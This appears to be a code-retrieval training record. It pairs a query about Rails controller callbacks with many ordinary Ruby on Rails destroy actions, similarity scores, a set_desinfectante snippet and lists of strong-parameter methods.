"def destroy\n @etiquetum.destroy\n respond_to do |format|\n format.html { redirect_to etiqueta_url, notice: 'Etiqueta borrada!' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @ficha = Ficha.find(params[:id])\n @ficha.destroy\n\n respond_to do |format|\n format.html { redirect_to fichas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @estado_remate.destroy\n respond_to do |format|\n format.html { redirect_to estado_remates_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @oficio.destroy\n respond_to do |format|\n format.html { redirect_to oficios_url, notice: 'Oficio eliminado exitosamente.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @especialidad.destroy\n respond_to do |format|\n format.html { redirect_to especialidads_url, notice: 'Servicio eliminado exitosamente.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @deuda = Deuda.find(params[:id])\n @deuda.destroy\n\n respond_to do |format|\n format.html { redirect_to deudas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @informacao_ged.destroy\n respond_to do |format|\n format.html { redirect_to informacoes_ged_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n #--ADICIONADO\n @cliente.perfilclientes.destroy\n #--ADICIONADO\n @cliente.destroy\n respond_to do |format|\n format.html { redirect_to clientes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @concedente.destroy\n respond_to do |format|\n format.html { redirect_to concedentes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @solicitante.destroy\n respond_to do |format|\n format.html { redirect_to solicitantes_url, notice: 'Solicitante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @desafio.destroy\n respond_to do |format|\n format.html { redirect_to desafios_url, notice: 'Desafio was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @estatuto = Estatuto.find(params[:id])\n @estatuto.destroy\n\n respond_to do |format|\n format.html { redirect_to estatutos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @asociado = Asociado.find(params[:id])\n @asociado.destroy\n\n respond_to do |format|\n format.html { redirect_to asociados_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @servico_pacote.destroy\n respond_to do |format|\n format.html { redirect_to servico_pacotes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @fornecedor.destroy\n addlog(\"Fornecedor apagado\")\n respond_to do |format|\n format.html { redirect_to fornecedores_url, notice: 'Fornecedor apagado com sucesso.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @veiculo = Veiculo.find(params[:id])\n @veiculo.destroy\n\n respond_to do |format|\n format.html { redirect_to veiculos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @ficha_recinto.destroy\n respond_to do |format|\n format.html { redirect_to ficha_recintos_url, notice: 'Ficha recinto was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @contatos_cliente.destroy\n respond_to do |format|\n format.html { redirect_to contatos_clientes_url, notice: 'Contatos cliente was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @detalhe.destroy\n respond_to do |format|\n format.html { redirect_to detalhes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @solicitud_servicio = SolicitudServicio.find(params[:id])\n @solicitud_servicio.destroy\n\n respond_to do |format|\n format.html { redirect_to solicitudes_servicios_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @cliente.destroy\n respond_to do |format|\n format.html { redirect_to clientes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @detalle_factura.destroy\n respond_to do |format|\n format.html { redirect_to detalle_facturas_url, notice: 'Detalle factura was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @serv_adicionale = ServAdicionale.find(params[:id])\n @serv_adicionale.destroy\n\n respond_to do |format|\n format.html { redirect_to serv_adicionales_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @sitio_entrega = SitioEntrega.find(params[:id])\n @sitio_entrega.destroy\n\n respond_to do |format|\n format.html { redirect_to sitio_entregas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @fertilizante.destroy\n respond_to do |format|\n format.html { redirect_to fertilizantes_url, notice: 'Fertilizante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @descuento_adicional.destroy\n respond_to do |format|\n format.html { redirect_to descuento_adicionals_url, notice: 'Descuento adicional fue eliminado exitosamente.' }\n format.json { head :no_content }\n end\n end",
"def delete\n request(:delete)\n end",
"def destroy\n @antecedente = Antecedente.find(params[:id])\n @antecedente.destroy\n\n respond_to do |format|\n format.html { redirect_to antecedentes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @trein_consul_comercial.destroy\n respond_to do |format|\n format.html { redirect_to trein_consul_comercials_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @reconocimiento = Reconocimiento.find(params[:id])\n @reconocimiento.destroy\n\n respond_to do |format|\n format.html { redirect_to reconocimientos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @safra_verdoso = SafraVerdoso.find(params[:id])\n @safra_verdoso.destroy\n\n respond_to do |format|\n format.html { redirect_to \"/safra_produtos/#{@safra_verdoso.safra_produto_id}/descontos\"}\n format.json { head :no_content }\n end\n end",
"def destroy\n @concedente = Concedente.find(params[:id])\n @concedente.destroy\n\n respond_to do |format|\n format.html { redirect_to concedentes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @objeto.destroy\n respond_to do |format|\n format.html { redirect_to referencia_bases_url, notice: \"Referencia base was successfully destroyed.\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @respuesta = Respuesta.find(params[:id])\n @respuesta.destroy\n\n head :no_content\n end",
"def destroy\n @tarifas_servicio.destroy\n respond_to do |format|\n format.html { redirect_to tarifas_servicios_url, notice: 'Tarifas servicio Fue destruido con éxito.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @diemtrentuyen = Diemtrentuyen.find(params[:id])\n @diemtrentuyen.destroy\n\n respond_to do |format|\n format.html { redirect_to diemtrentuyens_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @respuestum.destroy\n respond_to do |format|\n format.html { redirect_to comentarios_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @sugerencia = Sugerencia.find(params[:id])\n @sugerencia.destroy\n\n respond_to do |format|\n format.html { redirect_to sugerencias_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @inicio.destroy\n respond_to do |format|\n format.html { redirect_to inicios_url, notice: 'Inicio was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def delete(path)\n RestClient.delete request_base+path\n end",
"def destroy\n @interventoriasfecha = Interventoriasfecha.find(params[:id])\n @interventoriasfecha.destroy\n\n respond_to do |format|\n format.html { redirect_to(interventoriasfechas_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @prueba_json.destroy\n respond_to do |format|\n format.html { redirect_to prueba_jsons_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n contrato = @fatura.contrato\n @fatura.destroy\n respond_to do |format|\n format.html { redirect_to contrato, notice: 'Fatura excluída com sucesso.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @contenu_vente.destroy\n respond_to do |format|\n format.html { redirect_to contenu_ventes_url, notice: 'Contenu vente was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @tipo_convenio = TipoConvenio.find(params[:id])\n @tipo_convenio.destroy\n\n respond_to do |format|\n format.html { redirect_to tipo_convenios_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @depoevento = Depoevento.find(params[:id])\n @depoevento.destroy\n\n respond_to do |format|\n format.html { redirect_to depoeventos_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @tipo_unidad.destroy\n respond_to do |format|\n format.html { redirect_to tipo_unidades_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @asiento = Asiento.find(params[:id])\n @asiento.destroy\n\n respond_to do |format|\n format.html { redirect_to asientos_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @item_de_despesa.destroy\n addlog(\"Item de despesa apagado\")\n respond_to do |format|\n format.html { redirect_to itens_de_despesa_url, notice: 'Item de despesa apagado com sucesso.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @restaurantes_proximo.destroy\n respond_to do |format|\n format.html { redirect_to restaurantes_proximos_url, notice: 'Restaurantes proximo was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @solicitud.destroy\n respond_to do |format|\n format.html { redirect_to solicituds_url, notice: \"Solicitud was successfully destroyed.\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @solicitud.destroy\n respond_to do |format|\n format.html { redirect_to solicituds_url, notice: 'Solicitud was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @interessado.destroy\n respond_to do |format|\n format.html { redirect_to interessados_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @estudiante = Estudiante.find(params[:id])\n @estudiante.destroy\n\n respond_to do |format|\n format.html { redirect_to estudiantes_url, :notice => \"#{@estudiante.persona.nombre_completo} eliminado\" }\n format.json { head :no_content }\n end#do\n end",
"def destroy\n @nota_tecnica.destroy\n respond_to do |format|\n format.html { redirect_to nota_tecnicas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @chaine = Chaine.find(params[:id])\n @chaine.destroy\n\n respond_to do |format|\n format.html { redirect_to chaines_url }\n format.json { head :no_content }\n end\n end",
"def destroy\r\n @fabricante.destroy\r\n respond_to do |format|\r\n format.html { redirect_to fabricantes_url, notice: 'Fabricante excluída com sucesso.' }\r\n format.json { head :no_content }\r\n end\r\n end",
"def destroy\n @lista_contato = ListaContato.find(params[:id])\n @lista_contato.destroy\n\n respond_to do |format|\n format.html { redirect_to listas_contato_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @ordenes_consumos_detalle.destroy\n respond_to do |format|\n format.html { redirect_to ordenes_consumos_detalles_url, notice: 'Ordenes consumos detalle was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @cliente = Cliente.find(params[:id])\n @cliente.destroy\n\n respond_to do |format|\n format.html { redirect_to clientes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @cliente = Cliente.find(params[:id])\n @cliente.destroy\n\n respond_to do |format|\n format.html { redirect_to clientes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @cliente = Cliente.find(params[:id])\n @cliente.destroy\n\n respond_to do |format|\n format.html { redirect_to clientes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n# redirect_to activacionclientets_path # ted esto para evitar que borren por la web. ok. Que valla al index. provisional ok.\n \n #@activacionclientet.destroy\n respond_to do |format|\n format.html { redirect_to activacionclientets_url, notice: 'Activacionclientes no se puede eliminar por esta via. Contacte el administrador.' } # ted esto para evitar que borren por la web\n format.json { head :no_content }\n end\n end",
"def delete\n unless possui_acesso?()\n return\n end\n @aviso = Aviso.find(params[:id])\n @aviso.destroy\n\n respond_to do |format|\n format.html { redirect_to avisos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @objeto.destroy\n respond_to do |format|\n format.html { redirect_to tipo_referencia_bases_url, notice: \"Tipo referencia base was successfully destroyed.\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @fisier.destroy\n respond_to do |format|\n format.html { redirect_to root_path }\n format.json { head :no_content }\n end\n end",
"def destroy\n @asiento_de_servicio.destroy\n respond_to do |format|\n format.html { redirect_to asiento_de_servicios_url, notice: 'Asiento de servicio was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @venta = Venta.find(params[:id])\n @venta.destroy\n\n respond_to do |format|\n format.html { redirect_to ventas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @seguidore = Seguidore.find(params[:id])\n @seguidore.destroy\n\n respond_to do |format|\n format.html { redirect_to seguidores_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @consulta_viaje.destroy\n respond_to do |format|\n format.html { redirect_to consulta_viajes_url, notice: 'Consulta viaje was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @humanidades2 = Humanidades2.find(params[:id])\n @humanidades2.destroy\n\n respond_to do |format|\n format.html { redirect_to humanidades2s_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @rango_fecha.destroy\n respond_to do |format|\n format.html { redirect_to rango_fechas_url, notice: 'Rango fecha was successfully destroyed.' }\n format.json { head :no_content }\n end\n end"
] |
[
"0.71394247",
"0.7127553",
"0.71198034",
"0.70285964",
"0.7027966",
"0.70126766",
"0.7010169",
"0.7007926",
"0.69764686",
"0.69739956",
"0.6956925",
"0.69524306",
"0.6950972",
"0.6937087",
"0.693446",
"0.6929953",
"0.6928403",
"0.69081795",
"0.6901356",
"0.6900193",
"0.68996346",
"0.6898617",
"0.6898449",
"0.68924767",
"0.6890246",
"0.68873423",
"0.68873423",
"0.6885539",
"0.68849844",
"0.6883127",
"0.68818337",
"0.6881071",
"0.6879052",
"0.6873922",
"0.6870483",
"0.68667454",
"0.6863315",
"0.68606305",
"0.6859344",
"0.6858163",
"0.6854766",
"0.68542117",
"0.68518305",
"0.6851827",
"0.6845595",
"0.6845405",
"0.68432313",
"0.68431956",
"0.6841108",
"0.6839843",
"0.68359506",
"0.6832926",
"0.6831637",
"0.68278646",
"0.68264467",
"0.6825432",
"0.68253624",
"0.6825233",
"0.6819566",
"0.681824",
"0.68140733",
"0.6813805",
"0.6812444",
"0.6810873",
"0.6810699",
"0.6809655",
"0.6809562",
"0.6809521",
"0.68074375",
"0.6806887",
"0.6806699",
"0.68048036",
"0.6802241",
"0.6801146",
"0.67992413",
"0.6797494",
"0.6796613",
"0.67965806",
"0.6796294",
"0.6795666",
"0.6795055",
"0.6794118",
"0.67939633",
"0.67911726",
"0.6790165",
"0.67901206",
"0.6787588",
"0.6784273",
"0.6784273",
"0.6784273",
"0.6781501",
"0.67809445",
"0.6780354",
"0.6776594",
"0.6776063",
"0.67747194",
"0.6771026",
"0.6770618",
"0.6768446",
"0.67677647"
] |
0.7309257
|
0
|
Use callbacks to share common setup or constraints between actions.
|
def set_desinfectante
@desinfectante = Desinfectante.find(params[:id])
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def set_required_actions\n # TODO: check what fields change to asign required fields\n end",
"def action_hook; end",
"def run_actions; end",
"def define_action_hook; end",
"def actions; end",
"def define_action_helpers\n if super && action == :save\n @instance_helper_module.class_eval do\n define_method(:valid?) do |*args|\n self.class.state_machines.fire_event_attributes(self, :save, false) { super(*args) }\n end\n end\n end\n end",
"def add_actions; end",
"def callbacks; end",
"def callbacks; end",
"def setup *actions, &proc\n (@setup_procs ||= []) << [proc, actions.size > 0 ? actions : [:*]]\n end",
"def define_action_helpers; end",
"def post_setup\n end",
"def action_methods; end",
"def action_methods; end",
"def action_methods; end",
"def before_setup; end",
"def action_run\n end",
"def execute(setup)\n @action.call(setup)\n end",
"def define_action_helpers?; end",
"def set_actions\n actions :all\n end",
"def action_done(action)\n dispatch = { :migrate => :done_migrating, :map => :done_mapping, :reduce =>\n :done_reducing, :finalize => :done_finalizing } \n self.send dispatch[action[:action]], action\n end",
"def dependencies action, &block\n @actions.each do |other|\n if action[:requires].include? other[:provide]\n block.call other\n end\n end\n end",
"def setup!\n return unless @setup_procs\n http_actions = actions\n @setup_procs.each do |setup_proc|\n proc, actions = setup_proc\n @setup__actions = actions.map do |action|\n\n action.is_a?(Regexp) ?\n http_actions.select { |a| a.to_s =~ action } :\n action.is_a?(String) && action =~ /\\A\\./ ?\n http_actions.map { |a| a.to_s << action if format?(a).include?(action) }.compact :\n action\n\n end.flatten\n self.class_exec &proc\n @setup__actions = nil\n end\n @setup_procs = nil\n end",
"def before_actions(*logic)\n self.before_actions = logic\n end",
"def setup_handler\n end",
"def set_action(opts)\n opts = check_params(opts,[:actions])\n super(opts)\n end",
"def setup(action)\n @targets.clear\n unless action.item.target_filters.empty?\n @targets = SES::TargetManager.make_targets(action)\n else\n item = action.item\n if item.for_opponent?\n @targets = $game_troop.alive_members\n elsif item.for_dead_friend?\n @targets = $game_party.battle_members.select { |actor| actor.dead? }\n else\n $game_party.battle_members.select { |actor| actor.alive? }\n end\n end\n @item_max = @targets.size\n create_contents\n refresh\n show\n activate\n end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def workflow\n end",
"def revisable_shared_setup(args, block)\n class << self\n attr_accessor :revisable_options\n end\n options = args.extract_options!\n self.revisable_options = Options.new(options, &block)\n \n self.send(:include, Common)\n self.send(:extend, Validations) unless self.revisable_options.no_validation_scoping?\n self.send(:include, WithoutScope::QuotedColumnConditions)\n end",
"def setup\n @action = SampleActionAndroid.new(os_name: 'android',\n app_name: APP_PATH)\n end",
"def before(action)\n invoke_callbacks *self.class.send(action).before\n end",
"def process_action(...)\n send_action(...)\n end",
"def before_dispatch(env); end",
"def after_actions(*logic)\n self.after_actions = logic\n end",
"def setup\n # override and do something appropriate\n end",
"def setup(client)\n return unless @setup\n actions = @setup['setup'].select { |action| action['do'] }.map { |action| Action.new(action['do']) }\n actions.each do |action|\n action.execute(client)\n end\n self\n end",
"def setup(_context)\n end",
"def setup(resources) ; end",
"def validate_actions\n errors.add(:base, :should_give_at_least_one_action) if !manage? && !forecasting? && !read? && !api?\n end",
"def setup\n @resource_config = {\n :callbacks => {\n :before_create => nil,\n :after_create => nil,\n :before_update => nil,\n :after_update => nil,\n :before_destroy => nil,\n :after_destroy => nil,\n },\n :child_assoc => nil,\n :model => nil,\n :parent => nil,\n :path => nil,\n :permission => {},\n :properties => {},\n :relation => {\n :create => nil,\n :delete => nil,\n },\n :roles => nil,\n }\n end",
"def determine_valid_action\n\n end",
"def process_shared\n handle_taxes\n handle_shippings\n create_adjustments_from_params\n handle_status\n handle_inventory_refunds\n handle_payment_transactions\n order.updater.update\n end",
"def startcompany(action)\n @done = true\n action.setup\n end",
"def init_actions\n am = action_manager()\n am.add_action(Action.new(\"&Disable selection\") { @selection_mode = :none; unbind_key(32); bind_key(32, :scroll_forward); } )\n am.add_action(Action.new(\"&Edit Toggle\") { @edit_toggle = !@edit_toggle; $status_message.value = \"Edit toggle is #{@edit_toggle}\" })\n end",
"def event_callbacks(event, metadata={})\n case event\n when :reset, :review\n if confirmed\n update_attributes(confirmed: false)\n end\n when :confirm\n confirm\n # trigger :order for all applicable items\n # NOTE: :order event is common to both physical and digital items\n items.each do |i|\n if i.event_permitted(:order)\n user_id = last_transition.user_id\n i.trigger!(:order, { order_id: id, user_id: user_id })\n end\n end\n when :complete_work\n request = metadata[:request]\n work_complete_notification(request)\n when :close\n close\n end\n if event != :close && !open\n reopen\n end\n end",
"def setup_action\n return unless PONY::ERRNO::check_sequence(current_act)\n new_sequence = @action_sequence[@sequence_index+1...@action_sequence.size]\n @sequence_index = 0\n new_sequence = DND::SkillSequence::ACTS[@acts[1]] + new_sequence\n execute_sequence\n end",
"def define_tasks\n define_weave_task\n connect_common_tasks\n end",
"def setup(&block)\n define_method(:setup, &block)\n end",
"def setup\n transition_to(:setup)\n end",
"def setup\n transition_to(:setup)\n end",
"def action\n end",
"def setup( *args )\n\t\t\tself.class.setupBlocks.each {|sblock|\n\t\t\t\tdebugMsg \"Calling setup block method #{sblock}\"\n\t\t\t\tself.send( sblock )\n\t\t\t}\n\t\t\tsuper( *args )\n\t\tend",
"def config(action, *args); end",
"def setup\n @setup_proc.call(self) if @setup_proc\n end",
"def before_action \n end",
"def setup_callbacks\n defined_callbacks.each do |meth|\n unless respond_to?(\"call_#{meth}_callbacks\".to_sym)\n self.class.module_eval <<-EOE\n def call_#{meth}_callbacks(*args)\n plugin_store.each {|a| a.call_#{meth}_callbacks(*args) } if respond_to?(:plugin_store) && plugin_store\n self.send :#{meth}, *args if respond_to?(:#{meth})\n end\n EOE\n end\n end\n end",
"def action\n end",
"def matt_custom_action_begin(label); end",
"def setup\n # override this if needed\n end",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def action(options,&callback)\n new_action = Action===options ? options : Action.new(options,&callback)\n # replace any with (shared name/alias or both default) + same arity\n @actions.delete_if do |existing_action|\n ((existing_action.names & new_action.names).size > 0 ||\n existing_action.default? && new_action.default?) &&\n existing_action.required.size == new_action.required.size &&\n existing_action.optional.size <= new_action.optional.size\n end\n @actions = (@actions + [new_action]).sort\n new_action\n end",
"def set_target_and_action target, action\n self.target = target\n self.action = 'sugarcube_handle_action:'\n @sugarcube_action = action\n end",
"def after(action)\n invoke_callbacks *options_for(action).after\n end",
"def pre_task\n end",
"def setup(server)\n server.on('beforeMethod', method(:before_method), 10)\n end",
"def add_actions\n attribute = machine.attribute\n name = self.name\n \n owner_class.class_eval do\n define_method(name) {self.class.state_machines[attribute].events[name].fire(self)}\n define_method(\"#{name}!\") {self.class.state_machines[attribute].events[name].fire!(self)}\n define_method(\"can_#{name}?\") {self.class.state_machines[attribute].events[name].can_fire?(self)}\n end\n end",
"def init_actions\n @select_action = SelectAction.new\n @endpoint_mouse_action = EndpointMouseAction.new\n @move_action = MoveAction.new\n end",
"def setup_signals; end",
"def after_created\r\n return unless compile_time\r\n Array(action).each do |action|\r\n run_action(action)\r\n end\r\nend",
"def after_created\r\n return unless compile_time\r\n Array(action).each do |action|\r\n run_action(action)\r\n end\r\nend",
"def set_target_and_action target, action\n self.target = target\n self.action = 'sugarcube_handle_action:'\n @sugarcube_action = action.respond_to?('weak!') ? action.weak! : action\n end",
"def initialize(*args)\n super\n @action = :set\nend",
"def after_set_callback; end",
"def setup\n #implement in subclass;\n end",
"def lookup_action; end",
"def setup &block\n if block_given?\n @setup = block\n else\n @setup.call\n end\n end",
"def setup_action\n return TSBS.error(@acts[0], 1, @used_sequence) if @acts.size < 2\n actions = TSBS::AnimLoop[@acts[1]]\n if actions.nil?\n show_action_error(@acts[1])\n end\n @sequence_stack.push(@acts[1])\n @used_sequence = @acts[1]\n actions.each do |acts|\n @acts = acts\n execute_sequence\n break if @break_action\n end\n @sequence_stack.pop\n @used_sequence = @sequence_stack[-1]\n end",
"def release_actions; end",
"def around_hooks; end",
"def save_action; end",
"def setup(easy)\n super\n easy.customrequest = @verb\n end",
"def action_target()\n \n end",
"def setup\n callback(:setup) do\n notify(:setup)\n migration_check.last_deployed_commit\n end\n end",
"def setup\n return unless @setup\n\n actions = @setup['setup'].select { |action| action['do'] }.map { |action| Action.new(action['do']) }\n run_actions_and_retry(actions)\n self\n end",
"def before_setup\n # do nothing by default\n end",
"def my_actions(options)\n @setup = false\n get_template_part(\"custom_used\",\"action_users\",true)\n end",
"def default_action; end",
"def setup(&blk)\n @setup_block = blk\n end",
"def callback_phase\n super\n end",
"def advice\n end",
"def _handle_action_missing(*args); end",
"def duas1(action)\n action.call\n action.call\nend",
"def shared_action(name, &block)\n @controller.shared_actions[name] = block\n end",
"def before_action action, &block\n @audience[:before][action] ||= Set.new\n @audience[:before][action] << block\n end",
"def setup_initial_state\n\n state_a = State.new(\"a\", 0)\n state_b = State.new(\"b\", 0)\n state_c = State.new(\"c\", 10)\n\n move_to_b = Action.new(\"move_to_b\", 1, state_b)\n\n move_to_c = Action.new(\"move_to_c\", 1, state_c)\n\n state_a.actions = [move_to_b, move_to_c]\n\n return state_a\n \nend"
] |
[
"0.6163163",
"0.6045976",
"0.5946146",
"0.591683",
"0.5890051",
"0.58349305",
"0.5776858",
"0.5703237",
"0.5703237",
"0.5652805",
"0.5621621",
"0.54210985",
"0.5411113",
"0.5411113",
"0.5411113",
"0.5391541",
"0.53794575",
"0.5357573",
"0.53402257",
"0.53394014",
"0.53321576",
"0.53124547",
"0.529654",
"0.5296262",
"0.52952296",
"0.52600986",
"0.52442724",
"0.52385926",
"0.52385926",
"0.52385926",
"0.52385926",
"0.52385926",
"0.5232394",
"0.523231",
"0.5227454",
"0.52226824",
"0.52201617",
"0.5212327",
"0.52079266",
"0.52050185",
"0.51754695",
"0.51726824",
"0.51710224",
"0.5166172",
"0.5159343",
"0.51578903",
"0.51522785",
"0.5152022",
"0.51518047",
"0.51456624",
"0.51398855",
"0.5133759",
"0.5112076",
"0.5111866",
"0.5111866",
"0.5110294",
"0.5106169",
"0.509231",
"0.50873137",
"0.5081088",
"0.508059",
"0.50677156",
"0.50562143",
"0.5050554",
"0.50474834",
"0.50474834",
"0.5036181",
"0.5026331",
"0.5022976",
"0.5015441",
"0.50121695",
"0.5000944",
"0.5000019",
"0.4996878",
"0.4989888",
"0.4989888",
"0.49864885",
"0.49797225",
"0.49785787",
"0.4976161",
"0.49683493",
"0.4965126",
"0.4958034",
"0.49559742",
"0.4954353",
"0.49535993",
"0.4952725",
"0.49467874",
"0.49423352",
"0.49325448",
"0.49282882",
"0.49269363",
"0.49269104",
"0.49252945",
"0.4923091",
"0.49194667",
"0.49174926",
"0.49173003",
"0.49171105",
"0.4915879",
"0.49155936"
] |
0.0
|
-1
|
Never trust parameters from the scary internet, only allow the white list through.
|
def desinfectante_params
params.require(:desinfectante).permit(:marca, :tipo, :precio, :presentacion, :stock, :liquido)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def strong_params\n params.require(:user).permit(param_whitelist)\n end",
"def strong_params\n params.require(:listing_member).permit(param_whitelist)\n end",
"def allow_params_authentication!; end",
"def allowed_params\n ALLOWED_PARAMS\n end",
"def default_param_whitelist\n [\"mode\"]\n end",
"def param_whitelist\n [:role, :title]\n end",
"def expected_permitted_parameter_names; end",
"def safe_params\n params.except(:host, :port, :protocol).permit!\n end",
"def strong_params\n params.require(:team_member).permit(param_whitelist)\n end",
"def permitir_parametros\n \t\tparams.permit!\n \tend",
"def strong_params\n params.require(:community).permit(param_whitelist)\n end",
"def permitted_strong_parameters\n :all #or an array of parameters, example: [:name, :email]\n end",
"def strong_params\n params.require(:education).permit(param_whitelist)\n end",
"def restricted_params\n #params.require(self.controller_name.classify.underscore.to_sym).permit([])\n raise(\"No strong params set, override restricted_params method in your controller. E.g. params.require(:model).permit(:attribute1, :attribute2)\")\n end",
"def allowed_params\n params.require(:user).permit(:username, :email, :password, :password_confirmation)\n end",
"def param_whitelist\n [:rating, :review]\n end",
"def param_whitelist\n whitelist = [\n :username, :name,\n :parent_id,\n :headline, :description, :video,\n :policy, :signup_mode, :category,\n :website, :facebook, :twitter, :linkedin,\n :founded_at,\n privacy: [\n :events,\n :resources\n ],\n permission: [\n :profile,\n :members,\n :children,\n :statistics,\n :posts,\n :listings,\n :resources,\n :events\n ],\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n \n if action_name === 'update'\n whitelist.delete(:parent_id)\n unless current_user.role_in(@community) === 'owner'\n whitelist.delete(:privacy)\n whitelist.delete(:permission)\n end\n end\n \n whitelist\n end",
"def param_whitelist\n if @user.present? && current_user != @user\n return [:followed]\n end\n \n whitelist = [\n :username, :email, :password,\n :first_name, :last_name,\n :birthday, :gender,\n :headline, :biography, :ask_about, :focus,\n :website, :facebook, :linkedin, :twitter, :github,\n roles: [],\n skills: [],\n interests: [],\n privacy: { contact: [] },\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n \n if action_name === 'update'\n whitelist.delete(:email)\n whitelist.delete(:password)\n end\n \n whitelist\n end",
"def valid_params_request?; end",
"def user_params \n \tparams.require(:user).permit(:name, :email, :password, :password_confirmation)# preventing CSTR\n end",
"def user_params\n params.permit(:name, :phoneNumber, :address, :postalCode, :local, :link, :counter, :latitude, :longitude) \n end",
"def strong_params\n params.require(:experience).permit(param_whitelist)\n end",
"def trim_whitelisted(params, whitelist)\n # remove any parameters that are not whitelisted\n params.each do |key, value|\n # if white listed\n if whitelist.include? key\n # strip the parameters of any extra spaces, save as string\n params[key] = value.to_s.strip\n else\n # delete any unauthorized parameters\n params.delete key\n end\n end\n params\n end",
"def whitelist_url_params\n params.require(:whitelist_url).permit(:domain)\n end",
"def allowed_params\n params.require(:allowed).permit(:email)\n end",
"def permitted_params\n []\n end",
"def trim_whitelisted(params, whitelist)\n # remove any parameters that are not whitelisted\n params.each do |key, value|\n # if white listed\n if whitelist.include? key\n # strip the parameters of any extra spaces, save as string\n params[key] = value.to_s.strip\n else\n # delete any unauthorized parameters\n params.delete key\n end\n end\n params\n end",
"def safe_params\n params.permit(:id, :name, :origin, :emails => []); #emails is an array\n end",
"def query_param\n\t\tparams.permit(:first_name, :last_name, :phone)\n\tend",
"def strong_params\n params.require(:success_metric).permit(param_whitelist)\n end",
"def devise_filter\r\n logger.debug(\"In devise_filter =>PARAMS: #{params.inspect}\")\r\n\r\n # White list for sign_up\r\n devise_parameter_sanitizer.for(:sign_up) { |u| u.permit(user_whitelist) }\r\n\r\n # White list for account update\r\n devise_parameter_sanitizer.for(:account_update) { |u| u.permit(user_whitelist, :current_password) }\r\n\r\n # White list for Invitation creation\r\n devise_parameter_sanitizer.for(:invite) { |u| u.permit(:account_type, :email, :invitation_token)}\r\n\r\n # White list for accept invitation\r\n devise_parameter_sanitizer.for(:accept_invitation) { |u| u.permit(user_whitelist, :invitation_token)}\r\n\r\n end",
"def whitelisted_user_params\n params.require(:user).\n permit( :first_name, :last_name, :email,:password,:password_confirmation,:birthday,:gender)\n end",
"def user_params\n ActionController::Parameters.permit_all_parameters = true\n params.require(:user) #.permit(:name, :surname, :phone, :password, :email, :time_zone)\n end",
"def safe_params\n params.require(:user).permit(:name)\n end",
"def strong_params\n params.require(:metric_change).permit(param_whitelist)\n end",
